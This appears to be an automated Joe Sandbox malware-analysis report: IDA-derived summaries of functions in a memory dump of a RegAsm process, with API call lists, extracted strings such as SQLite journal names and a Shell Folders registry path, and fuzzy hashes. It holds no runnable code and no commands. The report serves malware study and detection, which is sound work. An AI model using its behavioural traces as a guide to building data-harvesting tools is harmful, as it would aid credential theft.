                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                  • String ID: strings
                                                                                  • API String ID: 3166385802-3030018805
                                                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                  APIs
                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                  • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                  • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                  • memset.MSVCRT ref: 0041BA3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID: -journal$-wal
                                                                                  • API String ID: 438689982-2894717839
                                                                                  • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                  • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                  • GetTickCount.KERNEL32 ref: 0041887D
                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                  • String ID:
                                                                                  • API String ID: 4218492932-0
                                                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                  APIs
                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID: gj
                                                                                  • API String ID: 438689982-4203073231
                                                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                  • String ID: 0$6
                                                                                  • API String ID: 2029023288-3849865405
                                                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                  APIs
                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                  • memset.MSVCRT ref: 00405455
                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                  • memset.MSVCRT ref: 00405483
                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                  • String ID: 6$\
                                                                                  • API String ID: 404372293-1284684873
                                                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesErrorFileLastSleep$free
                                                                                  • String ID:
                                                                                  • API String ID: 1470729244-0
                                                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                  APIs
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1331804452-0
                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                  APIs
                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                  • String ID: advapi32.dll
                                                                                  • API String ID: 2012295524-4050573280
                                                                                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                  APIs
                                                                                  Strings
                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                  • <%s>, xrefs: 004100A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_snwprintf
                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                  • API String ID: 3473751417-2880344631
                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                  • String ID: %2.2X
                                                                                  • API String ID: 2521778956-791839006
                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintfwcscpy
                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                  • API String ID: 999028693-502967061
                                                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                  • API String ID: 2618321458-3614832568
                                                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFilefreememset
                                                                                  • String ID:
                                                                                  • API String ID: 2507021081-0
                                                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                  APIs
                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                  • free.MSVCRT ref: 00417544
                                                                                  • free.MSVCRT ref: 00417562
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                  • String ID:
                                                                                  • API String ID: 4131324427-0
                                                                                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                  • free.MSVCRT ref: 0041822B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: PathTemp$free
                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                  • API String ID: 924794160-1420421710
                                                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                  • String ID: Error$Error %d: %s
                                                                                  • API String ID: 313946961-1552265934
                                                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                  APIs
                                                                                  Strings
                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                  • API String ID: 3510742995-272990098
                                                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                  APIs
                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                    • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free$EnumValuememset$Open_wcsuprmemcpywcslen
                                                                                  • String ID:
                                                                                  • API String ID: 1423504147-0
                                                                                  • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                  • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0044A6EB
                                                                                  • memset.MSVCRT ref: 0044A6FB
                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID: gj
                                                                                  • API String ID: 1297977491-4203073231
                                                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                  APIs
                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                  • free.MSVCRT ref: 004174E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                  • String ID:
                                                                                  • API String ID: 4053608372-0
                                                                                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 0040D453
